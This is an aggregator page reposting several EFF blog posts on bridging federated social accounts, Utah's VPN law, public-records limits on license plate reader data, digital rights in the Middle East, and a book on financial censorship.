Anarcho-Libero-Constitutionalist-Transcendentalist – NewsStandard

Anarcho-Libero-Constitutionalist-Transcendentalist

READS: Bill of Rights (US) – Anarchist’s Cookbook – Preface to Transgression

VIDEOS: The Birth of a Tool, The Birth of a Wooden House, Basque Axes,

  • A Bridge to Somewhere: How to Link Your Mastodon, Bluesky, or Other Federated Accounts
    by Thorin Klosowski on May 1, 2026 at 2:52 pm

    One of the central promises of open social media services is interoperability—the idea that wherever you personally decide to post doesn’t require others to be there just to follow what you have to say. Think of it like a radio broadcast: you want to reach people and don't care where they are or what device they're using. For example, in theory, a Bluesky user can follow someone on Mastodon or Threads without having to create a Mastodon or Threads account. But these systems are still a work in progress, and you might need to tweak a few things to get it working correctly.Right now, broadcasting your message across social platforms can be a funky experience at best, deliberately broken up by oligopolists. The idea of the open web was baked into the internet via protocols like HTML and RSS that made it easy for anyone to visit a website or follow most blogs. The fact social media isn’t similarly open reflects an intentional choice to privatize the internet. Bridging and managing your posts so they’re viewable outside a singular source is part of the broader philosophy of POSSE, short for Post Own Site Syndicate Elsewhere (sometimes it’s Post Own Site, Share Everywhere). Instead of managing several accounts across different services, you post once to one primary site (which might be your personal website, or just one social media account), then set it up so it automatically publishes everywhere else. This way, it doesn’t matter where you or your audience is, and they're not walled off by account registration requirements. We’ll come back around to POSSE at the end of this post, but for now, let’s assume you just want your current main open social media account to actually have a chance to reach the most people it can. Why Post to the Open Social WebBecause the Fediverse and ATmosphere use different protocols, we need to use a third-party tool so accounts can communicate with each other. For that, we’ll need a bridge. 
As the name suggests, a bridge can connect one social media account to another, so you can post once and spread your message across several places. This isn’t just some niche concept: major blogging platforms like Wordpress and Ghost integrate posting to the Fediverse.Bridging is an important facet of POSSE, but also something more people should consider, even if they don’t run their own websites. For example, if you don’t want to create a Threads account just to interact with your one friend who uses that platform, you shouldn’t have to. The good news is, you don’t. There are several bridging services, like Fedisky, RSS Parrot, and pinhole, but Bridgy Fed is currently the simplest to use, so we’ll focus on that. How to Post to Bluesky from MastodonFrom your Mastodon account (or other Fediverse account, for simplicity’s sake we’ll stick to Mastodon throughout), search for the username @bsky.brid.gy@bsky.brid.gy and follow that account. Once you do, the account will follow you back and you’ll be bridged and people can find you from their Bluesky account. You should also get a DM with your bridged username. If you don’t see the @bsky.brid.gy@bsky.brid.gy user when you search, your Mastodon instance may be blocking the bridging tool. Threads users who have enabled Fediverse sharing will be able to find you with your standard Mastodon username (ie, @your_user_name@mastodon.social), but if they haven’t enabled sharing, they will not be able to see your account. While this search is still a beta feature, you might find it easier to share the full URL, which would look like this: https://www.threads.net/fediverse_profile/@your_user_name@mastodon.socialPeople on Bluesky can find you by: Either searching for your Mastodon username, or if that doesn’t work, @your_user_name.instance.ap.brid.gy. 
For example, if your username is @eff@mastodon.social, it would appear as @eff.mastodon.social.ap.brid.gy.An example of a Mastodon username from the Bluesky web client.How to Post to Mastodon and Bluesky from ThreadsYes, Threads is technically on the Fediverse, and you can bridge your Threads account to Mastodon or Bluesky (unless you’re in Europe, where the feature is disabled), but it’s a different process than on Bluesky and Mastodon.Open Settings > Account > Fediverse Sharing and set the option to “On.” This will make your posts visible to Mastodon (or other Fediverse) users, and vice versa. Once the Fediverse sharing is enabled, you’ll likely need to wait a week, then you can bridge to Bluesky. Search for and follow the @bsky.brid.gy@bsky.brid.gy account (it may take some digging to find it, but if that doesn’t work you can try visiting the profile page directly. People on Mastodon (or other Fediverse accounts) and Bluesky can find you by: Mastodon users can find you at, @your_threads_username@threads.net while Bluesky users will find you at, @your_threads_username.threads.net.ap.brid.gy (seriously, that will be the username). Note that some Mastodon instances may block Threads users entirely.An example of a Threads username from the Mastodon web client.An example of a Threads username from the Bluesky web client.How to Post to Mastodon and Threads from BlueskyFrom your Bluesky (or other ATProto) account, search for the username, “@ap.brid.gy” and follow that account. Once you do, the account will follow you back and you’ll be bridged, so people can follow you from Mastodon or other Fediverse accounts. You should also get a DM with your bridged username.People on Mastodon (or other Fediverse account) and Threads can find you by: Your username will appear as @your_bluesky_username@bsky.brid.gy. 
For example, if your Bluesky username is @eff@bsky.social, it would appear as @eff.bsky.social@bsky.brid.gy.An example of a Bluesky username from the Mastodon web client.How to Post Everywhere from Your Own WebsiteYou can bridge more than social media accounts. If you have your own website, you can bridge that too (as long as it supports microformats and webmention, or an Atom or RSS feed. If you have a blog, there’s a good chance you’re already good to go). When you do so, the bridged account will either post the full text (or image) of whatever you post to your personal site, or a link to that content, depending on how your website is set up. You’ll also probably want to log into your Bridgy user page so you can manage the account. Where people can find your bridged account: Usually, a user can just search for your website’s URL on their decentralized social network of choice, or enter it on the Bridgy Fed page. But if that doesn’t work, they can try @yourdomain.com@web.brid.gy from Mastodon or @yourdomain.com.web.brid.gy from Bluesky.An example of a bridged website username in the Mastodon web client.How Your Account Username Looks on Each PlatformYou’re Bound to Run Into Some QuirksSometimes messages take a little while to crossover between networks, and sometimes they don't crossover at all.You can’t log into a bridged account like a regular account, but Bridgy Fed does provide some tools to see incoming notifications and recent activity in case they’re not coming through properly.ActivityPub and ATProto don’t have the same feature set, so you will have certain capabilities for one account you might not have in another. For example, you can edit posts on Mastodon, but not on Bluesky. If you edit a post that’s bridged from Mastodon to Bluesky, the Bluesky post will not be updated. Replies can sometimes get lost, especially if the person (or people) replying to you doesn’t have sharing turned on.Ownership of accounts can get weird. 
For example, if you post to your own website and use a tool like WordPress or Ghost for federation (more info below), you don’t necessarily get access to a “normal” social media account, with a standard login and password.And more! This is still a work in progress that has some technical quirks, but it’s improving all the time, and it’s best to keep telling yourself that troubleshooting is part of the fun.Other Cool Stuff You Can DoAs mentioned up top, there’s a lot more you can do, and an increasing number of tools are making this process simpler. Bridgy Fed is one way to post to more places from a single account, but it’s far from the only way to do so. Here are just a few examples.Micro.blog is a paid service where you can blog from your own domain name, then post automatically to Mastodon, Bluesky, Threads, Tumblr, Nostr, LinkedIn, Medium, Pixelfed, and Flickr.Ghost is a blogging and newsletter platform that offers direct integration with the Fediverse, as well as support for Bluesky. WordPress offers the option to join the Fediverse through a community plugin. Other newsletter platforms, like Buttondown, also have plans for federation. Surf.social is a landing page and social media utility where you can show off all your various accounts (Federated or not). From the reader point of view, you can follow one publication’s numerous types of posts in one place. For example, 404 Media’s Surf.social feed includes its YouTube feed, podcast feed, and its journalists’ social media posts.If you think these new handles are a bit ugly, you can use a custom domain for your Bluesky or Fediverse account from your website. Of course, there are plenty of other tools, blogging platforms, and other utilities out there to help facilitate posting and bridging accounts, with new ones coming along every day. 
With proper support, time, and effort, eventually we will all be able to seamlessly interact across platforms, take our follows and followers to other services when a platform no longer suits our needs, and interact with a variety of web content regardless of what platform hosts it. Until then, we still need to do some DIY work, support the services we want to succeed, and push for more platforms and services to support federated protocols.

  • Utah’s New Law Targeting VPNs Goes Into Effect Next Week
    by Rindala Alajaji on April 30, 2026 at 11:33 pm

    For the last couple of years, we’ve watched the same predictable cycle play out across the globe: a state (or country) passes a clunky age-verification mandate, and, without fail, Virtual Private Network (VPN) usage surges as residents scramble to maintain their privacy and anonymity. We've seen this everywhere—from states like Florida, Missouri, Texas, and Utah, to countries like the United Kingdom, Australia, and Indonesia.  Instead of realizing that mass surveillance and age gates aren't exactly crowd favorites, Utah lawmakers have decided that VPNs themselves are the real issue. Next week, on May 6, 2026, Utah will become, to EFF’s knowledge, the first state in the nation to target the use of VPNs to avoid legally mandated age-verification gates. While advocates in states like Wisconsin successfully forced the removal of similar provisions due to constitutional and technical concerns, Utah is proceeding with a mandate that threatens to significantly undermine digital privacy rights.  What the Bill Does Formally known as the “Online Age Verification Amendments,” Senate Bill 73 (SB 73) was signed by Governor Spencer Cox on March 19, 2026. While the majority of the bill consists of provisions related to a 2% tax on revenues from online adult content that is set to take effect in October, one of the more immediate concerns for EFF is the section regulating VPN access, which goes into effect this coming Wednesday. The VPN Provisions The new law explicitly addresses VPN use in Section 14, which amends Section 78B-3-1002 of existing Utah statutes in two primary ways: Regulation based on physical location: Under the law, an individual is considered to be accessing a website from Utah if they are physically located there, regardless of whether they use a VPN, proxy server, or other means to disguise their geographic location. 
Ban on sharing VPN instructions: Commercial entities that host "a substantial portion of material harmful to minors" are now prohibited from facilitating or encouraging the use of a VPN to bypass age checks. This includes providing instructions on how to use a VPN or providing the means to circumvent geofencing. By holding companies liable for verifying the age of anyone physically in Utah, even those using a VPN, the law creates a massive "liability trap." Just like we argued in the case of the Wisconsin bill, if a website cannot reliably detect a VPN user's true location and the law requires it to do so for all users in a particular state, then the legal risk could push the site to either ban all known VPN IPs, or to mandate age verification for every visitor globally. This would subject millions of users to invasive identity checks or blocks to their VPN use, regardless of where they actually live.  "Don't Ask, Don't Tell" In practice, SB 73 is different from the Wisconsin proposal in that it stops short of a total VPN ban. Instead, it discourages using VPNs by imposing the liability described above and by muzzling the websites themselves from sharing information about VPNs. This raises significant First Amendment concerns, as it prevents platforms from providing basic, truthful information about a lawful privacy tool to their users.  Unlike previous drafts seen in other states, SB 73 doesn't explicitly ban the use of a VPN. Under a "don't ask, don't tell" style of enforcement, websites likely only have an obligation to ask for proof of age if they actually learn that a user is physically in Utah and using a VPN. If a site doesn’t know a user is in Utah, their broader obligation to police VPNs remains murky. So, while SB 73 isn’t as extreme as the discarded Wisconsin proposal, it remains a dangerous precedent. 
Technical Feasibility Then there is also the question of technical feasibility: Blocking all known VPN and proxy IP addresses is a technical whack-a-mole that likely no company can win. Providers add new IP addresses constantly, and no comprehensive blocklist exists. Complying with Utah’s requirements would require impossible technical feats. The internet is built to, and will always, route around censorship. If Utah successfully hampers commercial VPN providers, motivated users will transition to non-commercial proxies, private tunnels through cloud services like AWS, or residential proxies that are virtually indistinguishable from standard home traffic. These workarounds will emerge within hours of the law taking effect. Meanwhile, the collateral damage will fall on businesses, journalists, and survivors of abuse who rely on commercial VPNs for essential data security. These provisions won't stop a tech-savvy teenager, but they certainly will impact the privacy of every regular Utah resident who just wants to keep their data out of the hands of brokers or malicious actors. Uncharted Territory Lawmakers have watched age-verification mandates fail and, instead of reconsidering the approach, have decided to wage war on privacy itself. As the Cato Institute states:  “The point is that when an internet policy can be avoided by a relatively common technology that often provides significant privacy and security benefits, maybe the policy is the problem. Age verification regimes do plenty of damage to online speech and privacy, but attacking VPNs to try to keep them from being circumvented is doubling down on this damaging approach." Attacks on VPNs are, at their core, attacks on the tools that enable digital privacy. Utah is setting a precedent that prioritizes government control over the fundamental architecture of a private and secure internet, and it won’t stop at the state’s borders. Regulators in countries outside the U.S. 
are still eyeing VPN restrictions, with the UK Children’s Commissioner calling VPNs a “loophole that needs closing” and the French Minister Delegate for Artificial Intelligence and Digital Affairs saying VPNs are “the next topic on my list” after the country enacted a ban on social media for kids under 15. As this law goes into effect next week, we are entering uncharted territory. Lawmakers who can’t distinguish between a security tool and a "loophole" are now writing the rules for one of the most complex infrastructures on Earth. And we can assure that the result won't be a safer internet, only an increasingly less private one.

  • Open Records Laws Reveal ALPRs’ Sprawling Surveillance. Now States Want to Block What the Public Sees.
    by Beryl Lipton on April 30, 2026 at 4:54 pm

    Reporters, community advocates, EFF, and others have used public records laws to reveal and counteract abuse, misuse, and fraudulent narratives around how law enforcement agencies across the country use and share data collected by automated license plate readers (ALPRs). EFF is alarmed by recent laws in several states that have blocked public access to data collected by ALPRs, including, in some cases, information derived from ALPR data. We do not support pending bills in Arizona and Connecticut that would block the public oversight capabilities that ALPR information offers. Every state has laws granting members of the public the right to obtain records from state and local governments. These are often called “freedom of information acts” (FOIAs) or “public records acts” (PRAs). They are a powerful check by the people on their government, and EFF frequently advocates for robust public access and uses the laws to scrutinize government surveillance.  But lawmakers across the country, often in response to public scrutiny of police ALPRs, are introducing or enacting measures aimed at excluding broad swaths of ALPR information from disclosure under these public records laws. This could include whole categories of important information: general information about the extent of law enforcement use; details on ALPR sharing across policing agencies; data on the number of license plate scans conducted, where they happened, and how many “hits” for license plates of interest actually occur; analyses on how many false matches or other errors occur; and images taken of individuals’ own vehicles.  No thanks. Public records and public scrutiny of ALPR programs have shown that people are harmed by these systems and that retained ALPR data violates people’s privacy. In this moment, lawmakers should not be completely cutting off access to public records that document the abuses perpetuated by ALPRs.  
Transparency with privacy To be sure, there are legitimate concerns about wholesale public disclosure of raw ALPR data. After all, many of the harms people experience from these systems are based on the government’s collection, retention, and use of this information. Public transparency rights should not exacerbate the privacy harms suffered by people subjected to ALPR surveillance. But many current proposals do not address legitimate privacy concerns in a measured way, much less seek to harmonize people’s privacy with the public’s right to know. There is a better path to balancing privacy and transparency rights than outright bans or total disclosure.  Any legislative proposal concerning public access to ALPR data must start with this reality: ALPR data is deeply revealing about where a person goes, and thus about what they are doing and who they are doing it with. That’s a reason why EFF opposes ALPRs. It is dangerous that the police have so much of our ALPR information. Even worse for our privacy would be for police to disclose our ALPR information to our bosses, political opponents, and ex-friends. Or to surveillance-oriented corporations that would use our ALPR information to send us targeted ads, or monetize it by selling it to the highest bidder. On the other hand, EFF’s firsthand experience using public records from ALPR systems demonstrates the strong accountability value of public access to many kinds of ALPR data, including information like data-sharing reports and network audits. For example, in our “Data Driven” series, we used ALPR data-sharing and hit ratio reports to investigate the extent of ALPR data sharing between police departments and to analyze the number of ALPR scans that are ultimately associated with a crime-related vehicle. We have also identified racist uses of ALPR systems, ALPR surveillance of protestors, and ALPR tracking of a person who sought an abortion. 
Across the country, municipalities have been shutting down their contracts for ALPR use, often citing concerns with data sharing with federal and immigration agents.  These records are not just informational—they are leverage. Communities, journalists, and local officials have used ALPR disclosures to block new deployments, refuse contract renewals, and terminate existing agreements with surveillance vendors whose practices proved too dangerous to continue. Without this evidentiary record, it is far harder for cities to exercise their procurement power to say no. It is not always easy to harmonize transparency and privacy when one person wishes to use a public records law to obtain government records that reveal people’s personal information. The best approach is for public records laws to contain a privacy exemption that requires balancing, on a case-by-case basis, of the transparency benefits versus the privacy costs of disclosure. Many do. These provisions of public records laws already accommodate similar concerns about disclosing personal information of private individuals whose information the government may have collected, government employee’s private data, and other personal information.  The balancing provisions in these laws are often flexible and allow for nuance. For example, if a government record contains a mix of information that does not reveal people’s private information and some that does, agencies and courts can disclose the non-private information while withholding the truly private information. This is often accomplished with blacking out, or redacting, the private information. Applying this privacy-and-transparency balancing to ALPR records, it will often be appropriate for the government to disclose some information and withhold other information. 
Everybody should generally have access to records showing their own movements and other information captured by ALPRs, but the privacy protections in public records laws should foreclose a single person’s ability to get a copy of similar records about everyone else. And even with accessing your own data, there are complications with shared vehicles that should be considered when balancing privacy and transparency. An example of where it may be appropriate to release unredacted data and images would be vehicles engaged in non-sensitive government business. For example, a member of the public might use ALPR scans of garbage trucks to identify gaps in service, which would not reveal private information. On the other hand, it would be inappropriate to release the scans of a government social worker visiting their clients.  Public records laws should allow a requester to obtain some ALPR information about government surveillance of everyone else, in a manner that accommodates the public transparency interest in disclosure and people’s privacy interests. For example, the best public records laws would disclose the times and places that plate data was collected, but not plate data itself. This can be done, for example, by an agency or court finding that disclosing aggregated and/or deidentified ALPR data protects the privacy or other interests of individuals captured within the data. The best laws recognize that aggregation or de-identification of databases are redactions in service of individual privacy (which responding agencies must do), and are not creating new public records (which responding agencies sometimes need not do).  Likewise, in a government audit log of police searches of stored ALPR data, it will often be appropriate to disclose an officer’s investigative purposes to conduct a search, and the officer’s search terms – but not the search term if it is a license plate number. 
Many people do not want the world to know that they are under police investigation, and many public records laws generally limit the disclosure of such sensitive facts because of the reputational and privacy harm inherent in that disclosure. Aggregate ALPR information about, for example, the amount of data collected and error rates can have important transparency value and impact government policy. Requiring the public release of that kind of data contributes to informed public discussion of how our policing agencies do their jobs. This kind of information has been used to study, critique, and provide oversight of ALPR use. Thus, the wholesale exemption of ALPR information from disclosure under state public records laws would stymie the public’s ability to monitor how their government is using powerful and controversial surveillance technology. EFF cannot support such laws. Blocking transparency In Connecticut, SB 4 is a pending bill that would exclude, from that state’s public records law, information “gathered by” an ALPR or “created through an analysis of the information gathered by” an ALPR. This could ultimately harm individual civilians, who would have less ability to protect themselves from law enforcement that indiscriminately collect vehicle information. Other provisions of this bill would limit government use of ALPRs, and regulate data brokers. In Arizona, SB 1111 would restrict public access to ALPR data “collected by” an ALPR. The bill would even make it a felony to access or use data from an ALPR (or disseminate it) in violation of this article, which apparently might apply to a member of the public who obtained ALPR data with a public records request. The bill’s author claims it adds “guardrails” for ALPR use. Earlier this year, Washington state enacted a law that will exempt data “collected by” ALPRs from the state’s public records law. 
While “bona fide research” will still be a way for some people to obtain ALPR data, this may not include journalists and activists who analyze aggregate data to identify policy flaws. Notably, Washington courts found last year that information generated by ALPR, including images of an individual’s own vehicle, are public records; this new legislation will override that decision, blocking the ability for people to see what photos police have taken of their own vehicles. Other provisions of this new law will limit government use of ALPRs. A year ago, Illinois’ HB 3339 ended use of that state’s public records law to obtain ALPR information used and collected by the Illinois State Police (ISP), including both information “gathered by an ALPR” and information “created from the analysis of data generated by an ALPR.” This Illinois language for just the ISP is very similar to what is now being considered in Connecticut for all state and local agencies.  Sadly, the list goes on. Georgia exempted ALPR data (both “captured by or derived from” ALPRs) of any government agency from its open records law. Adding insult to injury, Georgia also made it a misdemeanor to knowingly request, use, or obtain law enforcement’s plate data for any purpose other than law enforcement. Maryland exempted “information gathered by” an ALPR from its public information act. Oklahoma exempted from its open records act the ALPR data “collected, retained or shared” by District Attorneys under that state’s Uninsured Vehicle Enforcement Program. These laws and bills in seven states are an unwelcome national trend. Next steps We urge legislators to reject efforts to amend state public records laws to wholly exempt ALPR information. This would diminish meaningful oversight over these controversial technologies. Public disclosure of some ALPR information is important.  
There is a better approach for states that want to harmonize privacy and transparency in the context of ALPR data:  Open records laws should cover, and not exclude, information collected by ALPRs, and also any public records derived from that information. Open records laws should have a privacy exemption that applies to all records, including information collected or derived from ALPRs. That exemption should require a case-by-case balancing of the transparency benefits and privacy costs of disclosure. These provisions work best when agencies and courts can analyze the context of the particular records, the weight of the privacy interests and public interests at stake, and other specific facts to fashion the best balance between these competing values.  When a document contains both exempt and non-exempt information, open records laws should require disclosure of the latter and withholding of the former. The best public records laws allow agencies to black out, or redact, specific private information while disclosing non-private information in the same records, threading the privacy and transparency needle. Finally, in the context of a law enforcement ALPR database (including both data collected by ALPRs and audit logs of police searches of stored ALPR data), the law should permit agencies to disclose aggregated and/or deidentified data, while withholding personally identifiable data. Importantly, the law should recognize that the steps an agency takes to protect individual privacy in ALPR databases should not be construed as creating a new public record.  FOIA balancing standards are one layer in a larger governance stack, and work best alongside strong guardrails on whether and how governments procure ALPR systems in the first place: public debate over vendor contracts, binding surveillance ordinances, strict data‑retention limits, and clear pathways to end ALPR programs entirely where the risks prove too great.

  • Digital Hopes, Real Power: From Connection to Collective Action
    by Jillian C. York on April 30, 2026 at 7:56 am

    This is the fifth and final installment of a blog series reflecting on the global digital legacy of the 2011 Arab uprisings. You can read the rest of the series here. If the Arab Spring was defined by optimism about what the internet could do, the years since have been marked by a more sober understanding of what it takes to defend it.  Back in 2011, the term “digital rights” was still fairly new. While in the decades prior, open source and hacker communities—as well as a handful of organizations including EFF—had advocated for digital freedoms, it was through the merging of disparate communities from around the world in the 2000s that digital rights came to be more clearly understood as an extension of fundamental human rights. In 2011, we observed that there were only a few organizations focused on digital rights in the region. Groups like Nawaat, which emerged from the Tunisian diaspora under the Ben Ali regime; the Arab Digital Expression Foundation, formed to promote the creative use of technology; and SMEX, which was initially created to teach journalists and others about social media but has grown to become a powerful force in the region, led the way. Since that time, dozens of organizations have emerged throughout the region to promote freedom of expression, innovation, privacy, and digital security. Understanding how the digital rights movement evolved in the Middle East and North Africa requires a closer look at the communities that shaped it, and the organizations that are carrying on the fight today. Perspectives from people and organizations that were key to these efforts offer critical insight into how the movement has grown and what challenges lie ahead. 
Reem Almasri, a senior researcher and digital sovereignty consultant, says that: ‘Digital rights’ emerged as a term around the Arab Spring, when the internet was still a fairly unregulated space, we were still trying to figure out the tech companies’ policies, and force governments to look at the internet as a fundamental right like water and electricity. But then the need to converge digital rights to everyday rights—economic, political, social rights—and to connect it to geopolitics has started to be thought about, and to be in discussion as well. And to not look at digital rights as a separate field from everything else that’s affecting it, from the geopolitical context. Mohamad Najem, who co-founded SMEX in 2008 and has led it to become the largest organization in the region, told me that, at the time, “Nobody gave [social media] a lot of attention in our region.” Their work was “a positive approach to social media, how we can democratize sharing information, how we can share more from civil society, change people’s minds, et cetera.” “After that phase,” he continues, “we can think about 2012-2013—after the Arab Spring, as an organization we started looking at the infrastructure of the internet, and how freedom of expression and privacy are affected. That’s when we started looking more at what we call digital rights.” Towards Tech Accountability In the aftermath of the Arab Spring, social media companies moved from a largely hands-off approach to governance toward more formalized—and often opaque—content moderation systems. Platforms expanded their trust and safety teams and began working more closely with civil society through trusted partnerships in the region and globally. But, Mohamad Najem says: After the expansion of tech accountability itself and the adaptation of tech companies, we’ve noticed that it’s not taking us anywhere. 
Gradually we’ve come to a new phase where it feels like tech accountability is an economy by itself that is not leading to real results. So the next phase for us at least and maybe for others in global majority communities is how we can focus on digital public good, how we can push more governments, private and public institutions to adopt more open source software, to look at the ecosystem and understand the US threats happening now, et cetera. Another group that has played a key role in the fight for digital rights and tech accountability in the region is 7amleh, a Palestinian organization that was founded in 2013. At the time, says Jalal Abukhater: [I]t was unique and interesting in Palestinian society to have a human rights organization dedicated fully to the topic of digital rights, you know, human rights in a digital format. However, with the years, we saw various milestones, we saw progress of policy decisions and movements through the Israeli government to influence content moderation in Big Tech companies. We saw problems there as an organization. 7amleh took a leading stance in fighting to preserve the digital rights of Palestinians during a period where there was a very strong influence through the Israeli government. There was actually quite important reporting coming through 7amleh on the situation of online content moderation at a time when it wasn’t really a topic being discussed but it was very clearly a situation where there was major influence by government and political suppression happening as a result. An Ever-Expanding Ecosystem While in the early days, the digital rights movement attracted specialists, today, people from other fields have recognized how digital rights intersect with their work, and the digital rights community has embraced them. 
Almasri says: Because the digital rights movement has been decentralizing and has stopped being a speciality, it stopped being an exclusive thing for digital rights specialists, since of course the internet not only in the Arab region but all over the world has become a fundamental infrastructure for running any kind of sensitive operations, or operations in general…all types of organizations, and companies, and initiatives are thinking about their digital security, about how internet laws are affecting the use of the internet, or putting them at risk, and how surveillance technologies are affecting their operations. Abukhater credits the collaborative work that emerged within the region over the years in building the movement’s strength: [Today], civil society and digital civil society have many forums, many coalitions and networks, but it’s always important to remember that this is work that builds over many years of experience, and relationships, and networks—that it’s different parties coming to support each other at different phases to ensure that this kind of work succeeds and that this ecosystem is sustained globally with support from partner organizations which were very crucial in ensuring that this ecosystem is sustained, especially in Palestine. Growing Collaborations Conferences like Bread and Net, first held in Beirut in 2018, and the Palestine Digital Activism Forum (PDAF), first held in Ramallah in 2017, bring activists, academics, journalists, and other practitioners together to network and learn about each other’s work. The pandemic, conflict, and other barriers haven’t stopped either conference from carrying on: PDAF has become an annual virtual event that draws big-name speakers, while Bread & Net has spaced out its meetings but continues to draw bigger crowds each time.  Almasri credits these meetings with expanding the movement beyond the traditional techies and activists who first got involved. “You see a wide spectrum of different fields. 
You see artists, archivists, journalists joining these conversations, which is definitely on the brighter side of things when it comes to this field, or this scene.” She also credits the emergence of alliances such as the Middle East Alliance for Digital Rights (MADR, of which EFF is a member), founded in 2020 by individuals and organizations who had been working together for many years to formalize those collaborations. “Other than the collaborations at the advocacy level, [MADR] creates a sort of pressure point on Big Tech, on content moderation policies, allows for certain coordination at the level of the UN, et cetera, which I see as really positive because it brings some of the redundant efforts together and helps decide on priorities.” Looking Forward In thinking about the future of the movement, Almasri and Najem agree that digital rights are no longer a niche. In Najem’s words, “It’s about everything else…it’s about everything.”  Almasri adds: [W]hen it comes to priorities, things that this scene has been working on, I feel that October 7 [2023] was a big turning point in the way that digital rights activists, researchers, and academics—this field—is looking at digital rights in general. Of course, there is the major question of the need to revise tactics to fight Israel’s tech-enabled genocide that is also empowered by the global economy, big tech, and governments of the world?  What alliances should we start building on a regional and global level? She sees ‘digital sovereignty,’ the ability of people and communities to choose, control, and use technology that serves their needs and values, as one of the next big topics for the movement to tackle, as debates over who owns and hosts our data have sharpened amid revelations that U.S. companies have played a role in regional conflicts. 
There have been pockets of debates on how to achieve digital sovereignty, especially from human rights organizations documenting war crimes … There’s an awareness of how the dependence on US-based providers, cloud storage, even hosting infrastructure is a risk, especially after how using these services has been weaponized against the digital existence of certain organizations in the region that have been deplatformed or had their content removed on platforms like Meta and YouTube because their content doesn’t align with the foreign policy of the United States…so it raises a big question about how we look at digital independence, what is the spectrum of independence that civil society in the region can achieve, and in relation to what’s available as well. Almasri also points to the role of researchers in the region: There has been a lot more research on the political economy of surveillance technologies, so not only looking at how governments are using them, but their supply chain, who’s investing in these technologies, and how geopolitical networks empowered their proliferation in the hands of governments. This is where studies looking at the political economy of AI and the military become important, trying to understand how this field of weapons, the military, and AI grew together as part of this global capitalist system rather than looking at these technologies in silos, that is. Looking at the proliferation of these technologies from a geopolitical point of view, looking at the bigger ecosystem rather than zooming in to the specifics of it. I think this has been a big development in the way that we look at digital rights, and the way that digital rights have been converged and integrated into the geopolitical scene. As the global digital rights community continues to expand, it’s clear that the questions at its core are no longer just about access or expression, but about power—who holds it, how it is exercised, and who is left out of its protections. 
What began as a fight to keep the internet open has become a broader effort to reimagine it—an effort that is grappling with questions of infrastructure, ownership, and the global inequalities embedded in both. And yet, despite the scale of these challenges, the movement’s strength lies in the solidarity, the ecosystems, and the networks it has spent more than a decade building. From the early days of the blogging and techie communities to the increasingly powerful digital rights community, advocates in the region have gone up against dictators, endured war and repression, yet remain determined to push forward.

  • EFF Submission to UN Report on the Role of Media in the Context of Israel’s Policies Toward Palestinians
    by Paige Collings on April 29, 2026 at 9:22 pm

    The UN Special Rapporteur on the situation of human rights in the Palestinian territories occupied since 1967 recently announced a study addressing the killings and attacks against Palestinian journalists and media workers, the destruction of media infrastructure in Gaza, and the production and dissemination of narratives that may enable, justify, or incite international crimes.  As part of this consultation, EFF contributed a submission that identifies a significant deterioration of press freedom and free expression in the period since October 2023, including an increase in censorship and wave of killings of journalists; adding to an already pervasive censorship and surveillance regime for Palestinians.  In particular, concerns raised in our submission relate to: Government takedown requests  Disinformation and content moderation Attacks on internet infrastructure The concerns about censorship in Palestine are ever increasing, and include multiple international forums. Ending the deliberate digital isolation of the Palestinian people is critical to protecting fundamental human rights. Read the briefing in full here.

  • Former EFF Activism Director's New Book, Transaction Denied, Explores What Happens When Financial Companies Act like Censors
    by Jason Kelley on April 29, 2026 at 7:26 pm

    A U.S. citizen who teaches Persian poetry classes online is suddenly unable to receive payments or access funds when his account is flagged and frozen by PayPal and its subsidiary Venmo. A Muslim city councilwoman in New York City has a Venmo payment blocked because she uses the name of a Bangladeshi restaurant in the transaction. Online hubs for erotic storytelling repeatedly lose their payment accounts. Others active in drug legalization fights struggle to keep their bank accounts. These may sound like one-off issues, but they are not. They occur with frightening regularity, as former EFF Activism Director and Chief Program Officer, Rainey Reitman, who left EFF in 2022, describes in her new book, Transaction Denied. The book sheds new light on a serious problem that often hides in the shadows, and pushes us to ask an increasingly important question: “Is it ever OK for financial intermediaries to act as the arbiters of online expression?”   Both a storyteller and an advocate, Rainey exposes hidden systems of power that shape our choices, our speech, and, ultimately, our society. - Cindy Cohn Reitman makes her case about the impact of financial institutions and payment intermediaries shutting down accounts and inhibiting transactions through compelling individual stories, some of which have not been shared before. The people impacted are diverse: authors, teachers, journalists, elected politicians, and more are suddenly unable to retrieve or receive funds, with little explanation, transparency, or recourse. Reitman shows the reasons are frequently speech-related, resulting often from arbitrary corporate policy, a broad (mis)interpretation of the law, or in response to pressure from anti-speech advocates.  In the example of the Persian poetry teacher, the blocking is due to the highly risk averse interpretation of U.S. 
sanctions on Iran—sanctions aimed at deterring weapons development or terrorism instead snared a poetry professor and a New York city councilwoman. Reitman demonstrates how these sanctions, and others, have an outsized impact on Muslims. But Transaction Denied is also a guide for those interested in fighting for free speech. The book covers over a decade of successful campaigns and shows that advocacy can win the day—and is sometimes necessary to counter pro-censorship campaigns. Reitman offers a behind-the-scenes view of the campaign to help restore the Stripe account of the Nifty Archive Alliance, a nonprofit which supports the Nifty Archive, a hub of erotic storytelling for the queer community since 1992. She covers EFF's successful coalition and campaign to restore the PayPal account of Smashwords, a hub for self-published fiction. And in what has become a critical moment for free speech and free press, she describes how several EFF staff members and two EFF board members became the seed for a new nonprofit, the Freedom of the Press Foundation, which continues to partner with EFF today in advancing the rights of journalists. It’s a banner time for books by EFF staff members and friends. If you're concerned about how online privacy has changed over the last three decades, read EFF Executive Director Cindy Cohn's book, Privacy’s Defender, released in May. (All proceeds from the sale of hard copies of Privacy’s Defender are being donated to EFF, so your book order will help EFF continue fighting for the principles Cindy holds dear.) If you are worried about the individuals trapped in a system where massive financial companies can shut down their individual accounts, effectively locking up their access to money, based entirely on their speech, grab Transaction Denied, released earlier this month, at Beacon Press, Amazon, and Bookshop.org. (Half of the author proceeds go to Freedom of the Press Foundation.)  More likely—you'll want both books on your shelf. 
Happy reading! 

  • The Open Social Web Needs Section 230 to Survive
    by Rory Mir on April 28, 2026 at 8:59 pm

